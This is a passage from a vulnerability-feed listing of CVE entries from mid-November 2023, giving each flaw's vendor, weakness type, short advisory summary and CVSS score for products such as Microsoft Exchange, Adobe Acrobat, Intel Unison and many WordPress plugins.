2023-11-14 CVE-2023-47631 Vantage6 Insufficient Verification of Data Authenticity vulnerability in Vantage6

vantage6 is a framework to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC).

8.8
2023-11-14 CVE-2023-47640 Datahub Project Use of a Broken or Risky Cryptographic Algorithm vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

8.8
2023-11-14 CVE-2023-5528 Kubernetes
Fedoraproject
A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes.
8.8
2023-11-14 CVE-2023-22663 Intel Improper Authentication vulnerability in Intel Unison Software

Improper authentication for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-32641 Intel Unspecified vulnerability in Intel Quickassist Technology

Improper input validation in firmware for Intel(R) QAT before version QAT20.L.1.0.40-00004 may allow escalation of privilege and denial of service via adjacent access.

8.8
2023-11-14 CVE-2023-36860 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-39221 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-39412 Intel Cross-Site Request Forgery (CSRF) vulnerability in Intel Unison Software

Cross-site request forgery in some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access.

8.8
2023-11-14 CVE-2023-26205 Fortinet Improper Access Control vulnerability in Fortinet Fortiadc

An improper access control vulnerability [CWE-284] in FortiADC automation feature 7.1.0 through 7.1.2, 7.0 all versions, 6.2 all versions, 6.1 all versions may allow an authenticated low-privileged attacker to escalate their privileges to super_admin via a specific crafted configuration of fabric automation CLI script.

8.8
2023-11-14 CVE-2023-36017 Microsoft Out-of-bounds Write vulnerability in Microsoft products

Windows Scripting Engine Memory Corruption Vulnerability

8.8
2023-11-14 CVE-2023-36025 Microsoft Unspecified vulnerability in Microsoft products

Windows SmartScreen Security Feature Bypass Vulnerability

8.8
2023-11-14 CVE-2023-36400 Microsoft Unspecified vulnerability in Microsoft products

Windows HMAC Key Derivation Elevation of Privilege Vulnerability

8.8
2023-11-14 CVE-2023-36402 Microsoft Unspecified vulnerability in Microsoft products

Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-36423 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Remote Registry Service Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-36560 Microsoft Unspecified vulnerability in Microsoft .Net Framework

ASP.NET Security Feature Bypass Vulnerability

8.8
2023-11-14 CVE-2023-38151 Microsoft Unspecified vulnerability in Microsoft Host Integration Server and OLE DB Provider

Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-6130 Salesagility Path Traversal: '..filename' vulnerability in Salesagility Suitecrm

Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-6131 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-6125 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

8.8
2023-11-14 CVE-2023-48020 Iteachyou Cross-Site Request Forgery (CSRF) vulnerability in Iteachyou Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/changeStatus.

8.8
2023-11-14 CVE-2023-48021 Iteachyou Cross-Site Request Forgery (CSRF) vulnerability in Iteachyou Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/update.

8.8
2023-11-14 CVE-2023-44374 Siemens Unsynchronized Access to Shared Data in a Multithreaded Context vulnerability in Siemens products

Affected devices allow to change the password, but insufficiently check which password is to be changed.

8.8
2023-11-14 CVE-2023-46098 Siemens Overly Permissive Cross-domain Whitelist vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

8.8
2023-11-14 CVE-2023-47609 OSS Calendar SQL Injection vulnerability in Oss-Calendar OSS Calendar

SQL injection vulnerability in OSS Calendar versions prior to v.2.0.3 allows a remote authenticated attacker to execute arbitrary code or obtain and/or alter the information stored in the database by sending a specially crafted request.

8.8
2023-11-14 CVE-2023-42326 Netgate Command Injection vulnerability in Netgate Pfsense and Pfsense Plus

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

8.8
2023-11-13 CVE-2023-47621 Duncanmcclean Unrestricted Upload of File with Dangerous Type vulnerability in Duncanmcclean Guest Entries

Guest Entries is a php library which allows users to create, update & delete entries from the front-end of a site.

8.8
2023-11-13 CVE-2023-48058 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/run

8.8
2023-11-13 CVE-2023-48060 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/add

8.8
2023-11-13 CVE-2023-6097 Icssolution SQL Injection vulnerability in Icssolution ICS Business Manager 7.06.0028.2802/7.06.0028.7066/7.06.0028.7089

A SQL injection vulnerability has been found in ICS Business Manager, affecting version 7.06.0028.7089.

8.8
2023-11-13 CVE-2023-5747 Hanwhavision Improper Verification of Cryptographic Signature vulnerability in Hanwhavision products

Bashis, a Security Researcher at IPVM has found a flaw that allows for a remote code execution during the installation of Wave on the camera device.

8.8
2023-11-13 CVE-2023-35041 Webpushr Cross-Site Request Forgery (CSRF) vulnerability in Webpushr web Push Notifications

Cross-Site Request Forgery (CSRF) vulnerability leading to Local File Inclusion (LF) in Webpushr Web Push Notifications Web Push Notifications – Webpushr plugin <= 4.34.0 versions.

8.8
2023-11-13 CVE-2023-32583 Walkeprashant Cross-Site Request Forgery (CSRF) vulnerability in Walkeprashant WP ALL Backup

Cross-Site Request Forgery (CSRF) vulnerability in Prashant Walke WP All Backup plugin <= 2.4.3 versions.

8.8
2023-11-13 CVE-2023-32588 Brandbrilliance Cross-Site Request Forgery (CSRF) vulnerability in Brandbrilliance Post State Tags

Cross-Site Request Forgery (CSRF) vulnerability in BRANDbrilliance Post State Tags plugin <= 2.0.6 versions.

8.8
2023-11-13 CVE-2023-33207 Wielogorski Cross-Site Request Forgery (CSRF) vulnerability in Wielogorski Stop Referrer Spam

Cross-Site Request Forgery (CSRF) vulnerability in Krzysztof Wielogórski Stop Referrer Spam plugin <= 1.3.0 versions.

8.8
2023-11-13 CVE-2023-34378 Scriptburn Cross-Site Request Forgery (CSRF) vulnerability in Scriptburn WP Hide Post

Cross-Site Request Forgery (CSRF) vulnerability in scriptburn.Com WP Hide Post plugin <= 2.0.10 versions.

8.8
2023-11-13 CVE-2023-34384 Kebo Twitter Feed Project Cross-Site Request Forgery (CSRF) vulnerability in Kebo Twitter Feed Project Kebo Twitter Feed

Cross-Site Request Forgery (CSRF) vulnerability in Kebo Kebo Twitter Feed plugin <= 1.5.12 versions.

8.8
2023-11-13 CVE-2023-47669 Cozmoslabs Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder

Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin <= 3.10.3 versions.

8.8
2023-11-13 CVE-2023-26531 Wbolt Cross-Site Request Forgery (CSRF) vulnerability in Wbolt All-In-One Search Automatic Push Management

Cross-Site Request Forgery (CSRF) vulnerability in ??? ?????????????-??Baidu/Google/Bing/IndexNow/Yandex/?? plugin <= 4.2.7 versions.

8.8
2023-11-13 CVE-2023-26543 WP Meteor Cross-Site Request Forgery (CSRF) vulnerability in Wp-Meteor WP Meteor

Cross-Site Request Forgery (CSRF) vulnerability in Aleksandr Guidrevitch WP Meteor Website Speed Optimization Addon plugin <= 3.1.4 versions.

8.8
2023-11-13 CVE-2023-46618 Bala Krishna Cross-Site Request Forgery (CSRF) vulnerability in Bala-Krishna Category SEO Meta Tags

Cross-Site Request Forgery (CSRF) vulnerability in Bala Krishna, Sergey Yakovlev Category SEO Meta Tags plugin <= 2.5 versions.

8.8
2023-11-13 CVE-2023-46619 WEB Dorado Cross-Site Request Forgery (CSRF) vulnerability in Web-Dorado Wdsocialwidgets

Cross-Site Request Forgery (CSRF) vulnerability in WebDorado WDSocialWidgets plugin <= 1.0.15 versions.

8.8
2023-11-13 CVE-2023-46620 Fluenx Cross-Site Request Forgery (CSRF) vulnerability in Fluenx Deepl API Translation

Cross-Site Request Forgery (CSRF) vulnerability in Fluenx DeepL API translation plugin <= 2.3.9.1 versions.

8.8
2023-11-13 CVE-2023-46625 Daext Cross-Site Request Forgery (CSRF) vulnerability in Daext Autolinks Manager

Cross-Site Request Forgery (CSRF) vulnerability in DAEXT Autolinks Manager plugin <= 1.10.04 versions.

8.8
2023-11-13 CVE-2023-46629 Themelocation Cross-Site Request Forgery (CSRF) vulnerability in Themelocation Remove ADD to Cart Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in themelocation Remove Add to Cart WooCommerce plugin <= 1.4.4.

8.8
2023-11-13 CVE-2023-46636 Blackbam Cross-Site Request Forgery (CSRF) vulnerability in Blackbam Custom Header Images

Cross-Site Request Forgery (CSRF) vulnerability in David Stöckl Custom Header Images plugin <= 1.2.1 versions.

8.8
2023-11-13 CVE-2023-46638 Webcodin Cross-Site Request Forgery (CSRF) vulnerability in Webcodin WCP Openweather

Cross-Site Request Forgery (CSRF) vulnerability in Webcodin WCP OpenWeather plugin <= 2.5.0 versions.

8.8
2023-11-13 CVE-2023-47230 Cimatti Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Wordpress Contact Forms

Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.6.0 versions.

8.8
2023-11-13 CVE-2023-26514 Wpgrim Cross-Site Request Forgery (CSRF) vulnerability in Wpgrim Dynamic XML Sitemaps Generator for Google

Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Dynamic XML Sitemaps Generator for Google plugin <= 1.3.3 versions.

8.8
2023-11-13 CVE-2023-26516 Wpindeed Cross-Site Request Forgery (CSRF) vulnerability in Wpindeed Debug Assistant

Cross-Site Request Forgery (CSRF) vulnerability in WPIndeed Debug Assistant plugin <= 1.4 versions.

8.8
2023-11-13 CVE-2023-26518 Accesspressthemes Cross-Site Request Forgery (CSRF) vulnerability in Accesspressthemes WP Tfeed

Cross-Site Request Forgery (CSRF) vulnerability in AccessPress Themes WP TFeed plugin <= 1.6.9 versions.

8.8
2023-11-13 CVE-2023-26524 Expresstech Cross-Site Request Forgery (CSRF) vulnerability in Expresstech Quiz and Survey Master

Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.10 versions.

8.8
2023-11-13 CVE-2023-27434 Wpgrim Cross-Site Request Forgery (CSRF) vulnerability in Wpgrim Classic Editor and Classic Widgets

Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Classic Editor and Classic Widgets plugin <= 1.2.5 versions.

8.8
2023-11-13 CVE-2023-27436 Breakdance Cross-Site Request Forgery (CSRF) vulnerability in Breakdance Elegant Custom Fonts

Cross-Site Request Forgery (CSRF) vulnerability in Louis Reingold Elegant Custom Fonts plugin <= 1.0 versions.

8.8
2023-11-13 CVE-2023-27438 Yur4Enko Cross-Site Request Forgery (CSRF) vulnerability in Yur4Enko WP Translitera

Cross-Site Request Forgery (CSRF) vulnerability in Evgen Yurchenko WP Translitera plugin <= p1.2.5 versions.

8.8
2023-11-13 CVE-2023-27441 NEW Adman Project Cross-Site Request Forgery (CSRF) vulnerability in NEW Adman Project NEW Adman 1.6.7.2/1.6.8

Cross-Site Request Forgery (CSRF) vulnerability in gl_SPICE New Adman plugin <= 1.6.8 versions.

8.8
2023-11-13 CVE-2023-27445 Meril Cross-Site Request Forgery (CSRF) vulnerability in Meril Blog Floating Button

Cross-Site Request Forgery (CSRF) vulnerability in Meril Inc.

8.8
2023-11-14 CVE-2023-36052 Microsoft Unspecified vulnerability in Microsoft Azure CLI

Azure CLI REST Command Information Disclosure Vulnerability

8.6
2023-11-14 CVE-2023-45617 Arubanetworks
HP
There are arbitrary file deletion vulnerabilities in the CLI service accessed by PAPI (Aruba's access point management protocol).
8.2
2023-11-14 CVE-2023-45618 Arubanetworks
HP
There are arbitrary file deletion vulnerabilities in the AirWave client service accessed by PAPI (Aruba's access point management protocol).
8.2
2023-11-14 CVE-2023-45619 Arubanetworks
HP
There is an arbitrary file deletion vulnerability in the RSSI service accessed by PAPI (Aruba's access point management protocol).
8.2
2023-11-17 CVE-2023-48025 Howerj Out-of-bounds Read vulnerability in Howerj Liblisp

Liblisp through commit 4c65969 was discovered to contain a out-of-bounds-read vulnerability in unsigned get_length(lisp_cell_t * x) at eval.c

8.1
2023-11-17 CVE-2023-38130 Cubecart Cross-Site Request Forgery (CSRF) vulnerability in Cubecart

Cross-site request forgery (CSRF) vulnerability in CubeCart prior to 6.5.3 allows a remote unauthenticated attacker to delete data in the system.

8.1
2023-11-14 CVE-2023-20571 AMD Race Condition vulnerability in AMD products

A race condition in System Management Mode (SMM) code may allow an attacker using a compromised user space to leverage CVE-2018-8897 potentially resulting in privilege escalation.

8.1
2023-11-14 CVE-2023-45794 Siemens Authentication Bypass by Capture-replay vulnerability in Siemens Mendix

A vulnerability has been identified in Mendix Applications using Mendix 10 (All versions < V10.4.0), Mendix Applications using Mendix 7 (All versions < V7.23.37), Mendix Applications using Mendix 8 (All versions < V8.18.27), Mendix Applications using Mendix 9 (All versions < V9.24.10).

8.1
2023-11-17 CVE-2023-48029 Corebos Improper Neutralization of Formula Elements in a CSV File vulnerability in Corebos

Corebos 8.0 and below is vulnerable to CSV Injection.

8.0
2023-11-17 CVE-2023-5444 Mcafee Cross-Site Request Forgery (CSRF) vulnerability in Mcafee Epolicy Orchestrator

A Cross Site Request Forgery vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2 allows a remote low privilege user to successfully add a new user with administrator privileges to the ePO server.

8.0
2023-11-16 CVE-2023-43752 Elecom OS Command Injection vulnerability in Elecom products

OS command injection vulnerability in WRC-X3000GS2-W v1.05 and earlier, WRC-X3000GS2-B v1.05 and earlier, and WRC-X3000GS2A-B v1.05 and earlier allows a network-adjacent authenticated user to execute an arbitrary OS command by sending a specially crafted request.

8.0
2023-11-14 CVE-2023-25756 Intel Out-of-bounds Read vulnerability in Intel products

Out-of-bounds read in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via adjacent access.

8.0
2023-11-14 CVE-2023-36021 Microsoft Unspecified vulnerability in Microsoft On-Prem Data Gateway

Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability

8.0
2023-11-14 CVE-2023-36035 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36039 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36050 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Spoofing Vulnerability

8.0
2023-11-14 CVE-2023-36425 Microsoft Unspecified vulnerability in Microsoft products

Windows Distributed File System (DFS) Remote Code Execution Vulnerability

8.0
2023-11-14 CVE-2023-36439 Microsoft Unspecified vulnerability in Microsoft Exchange Server 2016/2019

Microsoft Exchange Server Remote Code Execution Vulnerability

8.0
2023-11-14 CVE-2023-46097 Siemens SQL Injection vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

8.0
2023-11-14 CVE-2023-31403 SAP Incorrect Authorization vulnerability in SAP Business ONE 10.0

SAP Business One installation - version 10.0, does not perform proper authentication and authorization checks for SMB shared folder.

8.0
2023-11-14 CVE-2023-47629 Datahub Project Improper Privilege Management vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

8.0
2023-11-17 CVE-2023-6179 Honeywell Incorrect Permission Assignment for Critical Resource vulnerability in Honeywell Prowatch 4.5

Honeywell ProWatch, 4.5, including all Service Pack versions, contain a Vulnerability in Application Server's executable folder(s).

7.8
2023-11-17 CVE-2023-47066 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47067 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47068 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47069 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-17 CVE-2023-47070 Adobe Out-of-bounds Write vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-17 CVE-2023-47073 Adobe Out-of-bounds Write vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47055 Adobe Use After Free vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47056 Adobe Out-of-bounds Write vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47057 Adobe Out-of-bounds Write vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47058 Adobe Out-of-bounds Read vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47059 Adobe Out-of-bounds Read vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-26368 Adobe Out-of-bounds Read vulnerability in Adobe Incopy

Adobe InCopy versions 18.5 (and earlier) and 17.4.2 (and earlier) are affected by are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47047 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44330 Adobe Out-of-bounds Write vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47040 Adobe Out-of-bounds Read vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-47041 Adobe Out-of-bounds Write vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47042 Adobe Out-of-bounds Write vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-47043 Adobe Out-of-bounds Read vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44282 Dell Improper Privilege Management vulnerability in Dell Repository Manager 1.1.52/1.2.155/1.3.124

Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module.

7.8
2023-11-16 CVE-2023-44292 Dell Improper Privilege Management vulnerability in Dell Repository Manager 1.1.52/1.2.155/1.3.124

Dell Repository Manager, 3.4.3 and prior, contains an Improper Access Control vulnerability in its installation module.

7.8
2023-11-16 CVE-2023-44336 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44337 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44338 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

7.8
2023-11-16 CVE-2023-44359 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44365 Adobe Access of Uninitialized Pointer vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44366 Adobe Out-of-bounds Write vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44367 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44371 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-44372 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user.

7.8
2023-11-16 CVE-2023-6119 Trellix Improper Privilege Management vulnerability in Trellix Getsusp

An Improper Privilege Management vulnerability in Trellix GetSusp prior to version 5.0.0.27 allows a local, low privilege attacker to gain access to files that usually require a higher privilege level.

7.8
2023-11-16 CVE-2023-39259 Dell Unspecified vulnerability in Dell OS Recovery Tool 2.2.4013/2.3.7012.0/2.3.7515.0

Dell OS Recovery Tool, versions 2.2.4013, 2.3.7012.0, and 2.3.7515.0 contain an Improper Access Control Vulnerability.

7.8
2023-11-16 CVE-2023-47470 Ffmpeg Out-of-bounds Write vulnerability in Ffmpeg

Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c

7.8
2023-11-15 CVE-2023-48199 Grocy Project Injection vulnerability in Grocy Project Grocy 4.0.3

HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution.

7.8
2023-11-15 CVE-2023-22818 Westerndigital Uncontrolled Search Path Element vulnerability in Westerndigital Sandisk Security Installer

Multiple DLL Search Order Hijack vulnerabilities were addressed in the SanDisk Security Installer for Windows that could allow attackers with local access to execute arbitrary code by executing the installer in the same folder as the malicious DLL. This can lead to the execution of arbitrary code with the privileges of the vulnerable application or obtain a certain level of persistence on the compromised host. 

7.8
2023-11-15 CVE-2023-48011 Gpac Use After Free vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.

7.8
2023-11-15 CVE-2023-48013 Gpac Double Free vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.

7.8
2023-11-15 CVE-2023-48014 Gpac Out-of-bounds Write vulnerability in Gpac 2.3Devrev566G50C2Ab06Fmaster

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.

7.8
2023-11-15 CVE-2023-33873 Aveva Unspecified vulnerability in Aveva products

This privilege escalation vulnerability, if exploited, cloud allow a local OS-authenticated user with standard privileges to escalate to System privilege on the machine where these products are installed, resulting in complete compromise of the target machine.

7.8
2023-11-15 CVE-2023-47580 Fujielectric Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Fujielectric Tellus and Tellus Lite

Multiple improper restriction of operations within the bounds of a memory buffer issues exist in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47581 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus and Tellus Lite

Out-of-bounds read vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47582 Fujielectric Access of Uninitialized Pointer vulnerability in Fujielectric Tellus and Tellus Lite

Access of uninitialized pointer vulnerability exists in TELLUS V4.0.17.0 and earlier and TELLUS Lite V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47583 Fujielectric Out-of-bounds Read vulnerability in Fujielectric Tellus 4.0.12.0/4.0.15.0

Multiple out-of-bounds read vulnerabilities exist in TELLUS Simulator V4.0.17.0 and earlier.

7.8
2023-11-15 CVE-2023-47584 Fujielectric Out-of-bounds Write vulnerability in Fujielectric V-Server

Out-of-bounds write vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-47585 Fujielectric Out-of-bounds Read vulnerability in Fujielectric V-Server

Out-of-bounds read vulnerability exists in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-47586 Fujielectric Out-of-bounds Write vulnerability in Fujielectric V-Server

Multiple heap-based buffer overflow vulnerabilities exist in V-Server V4.0.18.0 and earlier and V-Server Lite V4.0.18.0 and earlier.

7.8
2023-11-15 CVE-2023-35080 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure.

7.8
2023-11-15 CVE-2023-38043 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability exists on all versions of the Ivanti Secure Access Client below 22.6R1.1, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to a denial of service (DoS) condition on the user machine and, in some cases, resulting in a full compromise of the system.

7.8
2023-11-15 CVE-2023-38543 Ivanti Unspecified vulnerability in Ivanti Secure Access Client

A vulnerability exists on all versions of the Ivanti Secure Access Client below 22.6R1.1, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to a denial of service (DoS) condition on the user machine.

7.8
2023-11-15 CVE-2023-41718 Ivanti Unspecified vulnerability in Ivanti Secure Access Client 22.2/22.3

When a particular process flow is initiated, an attacker may be able to gain unauthorized elevated privileges on the affected system when having control over a specific file.

7.8
2023-11-15 CVE-2023-43590 Zoom Link Following vulnerability in Zoom Rooms

